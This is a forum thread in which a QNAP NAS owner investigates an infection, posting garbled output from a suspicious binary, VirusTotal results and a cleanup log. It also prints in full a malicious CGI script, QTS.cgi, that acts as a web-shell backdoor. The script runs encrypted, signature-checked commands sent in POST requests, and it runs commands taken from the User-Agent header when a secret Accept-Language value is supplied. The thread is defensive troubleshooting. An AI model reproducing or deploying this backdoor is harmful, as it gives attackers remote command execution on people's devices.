Virus on my QNAP?

[dolbyman]

post in codewraps or attach to forum, hard to judge without info

[jezz]

@Dolbyman:

I don't know how to attach the file to this post, therefor the information I can provide:

- I refer to the following file:

Code: Select all

[/etc/config] # ls -le init.sh
-rwxr-xr-x    1 admin    administ      2736 Wed Nov 26 16:32:47 2014 init.sh*

- I own a TS-459 Pro with the latest firmware (updated today).

- As I can not attach the actual file, I hereby include a part (first part) of the file:

Code: Select all

ELFT744 (77?
?
Y?????PQ?i??̀UWVS?D$?\$?L$?T$ ?t$$?|$(?l$,̀[^_]?U??SVW1?jQf??h?????uP?x?M
                                                                       ?]??????}?9?U??} ?̀??u??1??Љ?1?@̀??_^[]ÐU??WV??S1?1??s
?<???
     ??<??????<?C??(u?[^_]?U??WVS???U?1҈B??u??CщU?1??E??E??]?É]܊??]?]??4B??u؁??9?C׋}܉u?Ɗ?E???]?}?9}??r?ƀƀ??[^_]?Uщ?WVS???????M?]??E?M?A?????ljM????ށ???]?0?M?
                                    ??M?M?
                                          ?M?M??Ɋ
                                                0
B??;U?u??]?????????[^_]?U??W??V??S?ˁ???ڍ????????????????????????B????????????3??????????????????????????????????ڍ???????@;|???1???[^_]?U??WVS?Ӂ?jjPj?{??????      ??????jjPj?]??????@???)ĉ?t???PPjjR??t???Wh???l????,?????l????? 9Љ?tPPWj???????
?,PPWj???????1??@??t?t??????
78t????E?QPh?
7h????????????????&?]???M???p???9?9?????w
                                         ??O????????)̉?jjh?
7j?b?????XZjj?u?SWh??K????? ????;M?u;E?tQQWj?/???????PPWj????XZh?
7j
?
????E?%?PhAh?
7j??????? ?u?SP??j???????????;]?u;E?tSSWj?????????,?u??u?Wj_????ZYWj??????p?????????p????PPh?
7j
?t????E?%?PhAh?
7j?Z????? V??t???P??j?F????u??u?Sj_?8?????Sj?-????Eȃ?
                                                     ??x???Dž|????E???x????EЉE?Sh?
7h???????
         Sh?
7h???????1???e??[^_]?U??WVS????d?????t?????`?????????@9?u?1??
                                                             ??????@=?u???Džl?????T???????????t?????h???Džp?????l?????`?????p?????t???h????ى?????????????h?????       7????????u????h?????h????ىډ??x?????uŹ?    7?????f?????u?؉???ѥp????w?????l?????l???(?Z???1????d????@=?u?0??Ĕ[^_]ÍL$????q?U??WVSQ???0?Y??D???@?????8ut??@?????<?????xu?C???????u?j?jj?<???^_?sj
?0???XZjh??"???ZYjj??<(u??D?????)???2<=?
                                        ?1??a??v
?????5?t?????
        ʈ?5????F?? ?1?1?1ɋ?D????@??u?????5?????F??????=??????????ʍ???????????????????????????H??????????e???????X??
                                                                                                                   ??h???H???????????????????,??8?#??D??????????Pjj?j"jW????????4???h???????? ;?????????????f1???8?????????jWjj??????Hu6F??v'????????0????O?1??@?t0??0????8t?G??u?P??4?????????j[?_??????o??????1??C??8???V?Pjj?=???????%????????
                                                                                                 ??8?????????j?????????t??
(Enter:next line Space:next page Q:quit R:show the rest)
[/etc/config] # more init.sh
ELFT744 (77?
?
Y?????PQ?i??̀UWVS?D$?\$?L$?T$ ?t$$?|$(?l$,̀[^_]?U??SVW1?jQf??h?????uP?x?M
                                                                       ?]??????}?9?U??} ?̀??u??1??Љ?1?@̀??_^[]ÐU??WV??S1?1??s
?<???
     ??<??????<?C??(u?[^_]?U??WVS???U?1҈B??u??CщU?1??E??E??]?É]܊??]?]??4B??u؁??9?C׋}܉u?Ɗ?E???]?}?9}??r?ƀƀ??[^_]?Uщ?WVS???????M?]??E?M?A?????ljM????ށ???]?0?M?
                                    ??M?M?
                                          ?M?M??Ɋ
                                                0
B??;U?u??]?????????[^_]?U??W??V??S?ˁ???ڍ????????????????????????B????????????3??????????????????????????????????ڍ???????@;|???1???[^_]?U??WVS?Ӂ?jjPj?{??????      ??????jjPj?]??????@???)ĉ?t???PPjjR??t???Wh???l????,?????l????? 9Љ?tPPWj???????
?,PPWj???????1??@??t?t??????
78t????E?QPh?
7h????????????????&?]???M???p???9?9?????w
                                         ??O????????)̉?jjh?
7j?b?????XZjj?u?SWh??K????? ????;M?u;E?tQQWj?/???????PPWj????XZh?
7j
?
????E?%?PhAh?
7j??????? ?u?SP??j???????????;]?u;E?tSSWj?????????,?u??u?Wj_????ZYWj??????p?????????p????PPh?
7j
?t????E?%?PhAh?
7j?Z????? V??t???P??j?F????u??u?Sj_?8?????Sj?-????Eȃ?
                                                     ??x???Dž|????E???x????EЉE?Sh?
7h???????
         Sh?
7h???????1???e??[^_]?U??WVS????d?????t?????`?????????@9?u?1??
                                                             ??????@=?u???Džl?????T???????????t?????h???Džp?????l?????`?????p?????t???h????ى?????????????h?????       7????????u????h?????h????ىډ??x?????uŹ?    7?????f?????u?؉???ѥp????w?????l?????l???(?Z???1????d????@=?u?0??Ĕ[^_]ÍL$????q?U??WVSQ???0?Y??D???@?????8ut??@?????<?????xu?C???????u?j?jj?<???^_?sj
?0???XZjh??"???ZYjj??<(u??D?????)???2<=?
                                        ?1??a??v
?????5?t?????
        ʈ?5????F?? ?1?1?1ɋ?D????@??u?????5?????F??????=??????????ʍ???????????????????????????H??????????e???????X??
                                                                                                                   ??h???H???????????????????,??8?#??D??????????Pjj?j"jW????????4???h???????? ;?????????????f1???8?????????jWjj??????Hu6F??v'????????0????O?1??@?t0??0????8t?G??u?P??4?????????j[?_??????o??????1??C??8???V?Pjj?=???????%????????
                                                                                                 ??8?????????j?????????t??
--More-- (88% of 2736 bytes)

[OneCD]

Well, it starts with ELF so it's a binary executable. Wouldn't recommend running it though.

Try showing the text strings:

Code: Select all

strings /etc/config/init.sh

[jezz]

Output from the proposed command:

Code: Select all

[/etc/config] # strings /etc/config/init.sh
UWVS
[^_]
SVW1
_^[]
[^_]
[^_]
[^_]
[^_]
PPWj
PPWj
QQWj
PPWj
SSWj
ZYWj
[^_]
[^_]
WVSQ
Hu6F
Y[^_]
jC@}x
}PzdH
/usr/bin/sh
/bin/ash

[OneCD]

Ah, nothing revealing then.

[AlastairStevenson]

My only worry (for now) is the init.sh file in /etc/config. If someone knows if this can be deleted as it contains no normal script commands....

That's certainly going to be mailcious. Quite likely the malware foothold.
Drop a copy on to virustotal.com and see if it's recognised malware.

[jezz]

Hi @Alastair-Stevenson,

I dropped the file at virustotal.com.

Herewith the results:

Code: Select all

0 / 57
No engines detected this file
SHA-256	f12393982971024695b32caecdf16f4c96fe68a765949727f6a1b84e2eecbb6d
File name	init.sh
File size	2.67 KB
Last analysis	2015-06-04 10:31:24 UTC

Details:

Code: Select all

Basic Properties
MD5	59b6fdd280fe35f41f77065d3d8a69bf
SHA-1	774b1fd8d6050fa2f7661060bac1a88acc3a6fce
File Type	ELF
Magic	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
SSDeep	48:fQdCFNsQhYEqlhGgP66RaCHhOA5Nmh6rYIBCYwZX6MODXOB:fEC3sQRqlhGcRzpnOOpBC9X6PD+B
TRiD	ELF Executable and Linkable format (generic) (100%)
File Size	2.67 KB
Tags
elf
History
First Submission	2015-06-04 10:31:24
Last Submission	2015-06-04 10:31:24
Last Analysis	2015-06-04 10:31:24
File Names
init.sh
ELF Info
Header
Class	ELF32
Data	2's complement, little endian
Header Version	1 (current)
OS ABI	UNIX - System V
ABI Version	0
Object File Type	EXEC (Executable file)
Required Architecture	Intel 80386
Object File Version	0x1
Program Headers	1
Section Headers	0
Contained Segments
LOAD
ExifTool File Metadata
CPUArchitecture	32 bit
CPUByteOrder	Little endian
CPUType	i386
FileType	ELF executable
MIMEType	application/octet-stream
ObjectFileType	Executable file

I have restarted the NAS today and determined the last time this file has been accessed (using ls -lu). After the reboot the file wasn't accessed. So it might be that the malware -in the directory of autorun.sh (so not on the disks but on the NAS itself)- is the trigger to start this 'malware?'-executable. I will frequently look at the file if it has been accessed and check all other changes which indicate the malware might still be there.

[jezz]

Malware is still there.
After a reboot it creates at least a file in /home/httpd/cgi-bin/qid named QTS.cgi

I have added the content of this file below (malware remover deletes this file but not the creator..)
Anyone knows what it does (my knowledge of linux script is too limited)???

Code: Select all

[/home/httpd/cgi-bin/qid] # more QTS.cgi
#!/bin/sh
genrstr () 
{ 
    local s=;
    local min=${1:-4};
    local max=${2:-12};
    local kspace="${3:-a-zA-Z}"
    tr -dc "$kspace" < /dev/urandom | { 
        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
        echo "$s"
    }
}
command -v mktemp > /dev/null 2>&1 || mktemp () { 
local suffix=`genrstr 6 6`
test "$2" && { mkdir "${2%XXXXXX}$suffix"; echo "${2%XXXXXX}$suffix"; } || { touch "${1%XXXXXX}$suffix"; echo "${1%%XXXXXX}$suffix"; }
}
exec 2>/dev/null
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
test ! -z "${QUERY_STRING}" || { printf "Date: "; TZ=UTC date; exit 0; }
echo "Date: Fri Nov 18 22:06:14 GMT 2016"
cr=`printf '\r' || echo -ne '\r'`
test "${#cr}" -eq 1 && echo "$cr" || echo ""
test "x$HTTP_REFERER" = "x41f8047417288c333cd56c0b26a3db0d00f0c90e" || exit 0
test ! -z "${0}" && test `ps aux | grep "${0}" | wc -l` -gt 40 && exit 0
command -v openssl >/dev/null 2>&1 && {
POSTDATA=''
k="1PfFPWcCBz6LlhdAgRf4oZPNe3IvNQ6U"
test "x${REQUEST_METHOD}" = xPOST && test ! -z "${QUERY_STRING}" && case "${QUERY_STRING}" in '' | *[!0-9]* | 0* ) false ;; [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9] ) d="$(( `date +%s` / 100 ))"; test "${QUERY_STRING}" = "${d}" && ct="$d" || { test "${QUERY_STRING}" = "$(( $d - 1))" && ct="$(( $d - 1 ))"; } ;; *) false ;; esac && test ! -z "${QUERY_STRING}" && {
nl='
'
case "${CONTENT_LENGTH}" in '' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` || exit 0
s="${POSTDATA##*.}"
st="${s##*-}"
s="${s%%-*}"
d="$(( $d / 1000 ))"
test ! -z "$d" && test ! -z "$st" && test "${#st}" = 5 && { test "x$st" = "x$d" || test "x$st" = "x$(( $d - 1 ))"; } || { test -f "$t" && rm "$t"; exit 0; }
case "$s" in '' | *[!a-zA-Z0-9/+=$nl]* ) test -f "$t" && rm "$t"; exit 0; ;; esac
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAyiG+H/1fcLMfTNUvvBes
OJq06fOGmBFKIUOCPsyGpAuzDrCKlnBuHoL4hSEtnuxTBNt8jABzdZ+p9qUbAZ3O
zaPmJIds1gHHl1KF+Q8H5bNdNs9MCRkEvCUgJGFe3AalL7k+j/RXBsWrsLCKdGKW
aH+dtC0NdLKdkzhK8qBqzHxC+MUGzee5//OgDKdcKeelaCgzUJa0ui11BZ3IjKpQ
l7HokVHmyzRrJGPcuc4klH9bK4SeADehRyjylivHQcqSK1sNswapJm2qDjyQ7hjR
R2saOzubTUw1+2QKl+My5Sfyo/B8NopNY6EAOL8YCPVHCapq2af2ZythaV22VpfY
ztzjEy5OkFNh6fRgZNpbsuMu4nPaB/rgvJmsWx93ansh4IeXiPyOuKVBamUZyIvL
xr2ESC2rhgWhqgJuiLlHG+HMK63PodBMFyKq9rLd4h99nXb9+iCmFQ9fzJKs9SSM
j7xadGpabK2aNTpN3zDAuEGI4ZOtqxLqWjEHm0bE+Z5FAgMBAAE=
-----END PUBLIC KEY-----
EOF
test ! -z "$s" && h=`openssl base64 -d <<EOF | openssl rsautl -pubin -inkey "$t" -verify
$s
EOF
` || { test -f "$t" && rm "$t"; exit 0; }
test -f "$t" && rm "$t"
m="${POSTDATA%%.*}"
POSTDATA=''
case "$m" in '' | *[!a-zA-Z0-9/+=$nl]* ) exit 0 ;; esac
k=`openssl dgst -sha1 -binary -hmac "$ct" <<EOF | openssl base64
$k
EOF                         
`
m=`openssl enc -d -aes-256-cbc -k "$k" -md sha1 -salt -a <<EOF
$m
EOF
`
mh=`openssl dgst -sha1 -binary -hmac "$st" <<EOF | openssl base64
$m
EOF
`
test ! -z "$h" && test "$h" = "$mh" || exit 0
eval "$m"
true
} || {
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA9QmHMw4jw8COLYKgOqfC
0GZsRSwFgixT0liMc42ZSrssrsFGZlDPK35zldmbUsEQXtFYkDjVeUckp2ah8Fcf
ABFUG8MLnl6wTvxGZwJJbMLPDiYo5l/d07BKcbwYuqNp+2//2dukxCyakOIInIqF
LgrM5nvp5BKBBccMlMBasFtxZfFgtNjlQ9i9mNfi53nalrMPRol9KifW1YxmLw1+
7GTujFSlyK9Apvi/ZI2y/vym6NWbWEsaE5B9ggXJYrVxlbKxMIzWuXf18S2p48Fh
pVUyYJ0mjDUc3SiJR4RiPikPpTQgkSjy90aMKroWCAd9M6cZtfwCzhMbvytNmdtd
YxBNNn0FmQ51cLPc+dpaIIx2i/2cGdHY8ZAjBDMBMBkjIe2gFgc6lJ0WOlT638z+
w7/mP+hcCoLVUiGSiEumz3UL5PmoVa3w2t04Ra70PLWApGsI/gpHyH0W8i6yVBHE
qUsaQxnBOFvy+iSomyFil2dxKQLjTwyZBn8+1KmonJ2pAgMBAAE=
-----END PUBLIC KEY-----
EOF
openssl rsautl -pubin -inkey "$t" -encrypt <<EOF | openssl base64
$k
EOF
rm "$t"
true 
}; true; } || {
test "x$ACCEPT_LANGUAGE" = "x11238f2b4a7c2089afd1301374a658cfa8562ec6" && eval "$HTTP_USER_AGENT"
}
test -f "$t" && rm "$t"
sleep 1
exit 0

[dolbyman]

contact qnap for assistance

[Trexx]

I would say nothing good by the little bit of it I understand. I would make sure you router is set to block all QNAP incoming ports, make sure uPNP & probably for time being myqnapcloud is disabled etc.

If you are running the latest QTS version, look Control Panel / Hardware / and uncheck run user defined processes. You should also click the View Autorun.sh link to see if anything is listed there.

[dolbyman]

You should also click the View Autorun.sh link to see if anything is listed there.

viewtopic.php?f=50&t=136085#p641687

autorun.sh is apparently infected, with encrypted commands (?!?!)

[Trexx]

You should also click the View Autorun.sh link to see if anything is listed there.

viewtopic.php?f=50&t=136085#p641687

autorun.sh is apparently infected, with encrypted commands (?!?!)

Why I recommended UNCHECKING run it

[jezz]

Thanks @Trexx and @dolbyman,

There is no option to run user defined processes (probably because the highest version for 459Pro is 4.2.6 and not a 4.3.* version).
I have blocked all ports in my router and disabled the NAS from configuring my router.

I will contact QNAP for assistance.

Just to review my findings and actions taken (not in actual sequence):
- Removed all infected *.cgi files from /home/httpd/cgi-bin (and it's subdirectories)
- Removed the malware entry in crontab
- Removed hidden .RMM... directory (I believe it was /share/MD0_DATA/.qpkg)
- Removed all additions in script files of installed packages (as added after first line in the file .. )
- Removed autorun.sh and an malware executable from the startup directory (sdx6 device I believe)
- Restarted the NAS several times
- Installed latests firmware
- Changed all passwords for users
- Removed all non essential packages
- Installed latests Malware remover
- Keeping an eye on init.sh (still don't know if it can be deleted)
- Changed the names of the following files (as I don't trust them)

Code: Select all

-rw-r--r--    1 admin    administ       193 Sep 13 03:52 FVsSlowcXu
-rw-r--r--    1 admin    administ       393 Sep 13 03:52 NihLqRdqovnhIHi
-rw-r--r--    1 admin    administ      1679 Sep 13 03:52 gilgagrq

- Just noticed a user [sshd] (yes including square brackets is added to the passwd file... don't know if this is normal .. I don't know if this is also part of the malware .. potentially enabling access via sshd/ssh to QNAP systems??

Will keep you informed if I make any progress. If anyone has any brilliant thoughts, please share them.

[jezz]

Ticket to QNAP submitted.

[Paul Sweeney]

Anyone else getting these messages?

Running AVG on my laptop I am prevented from accessing my QNAP TS412 and am getting following messages:
"aborted connection on qnapcloud.... because it was infected with Win32:Malware-gen"
ditto but with "JS:Redirector-BWW"
I've checked that the NAS is up to date with virus database and has recently scanned with no reported issues. Is this for real and if so, why is the NAS antivirus not picking it up? Should I/can I run Spybot S&D on the NAS?

Advice appreciated!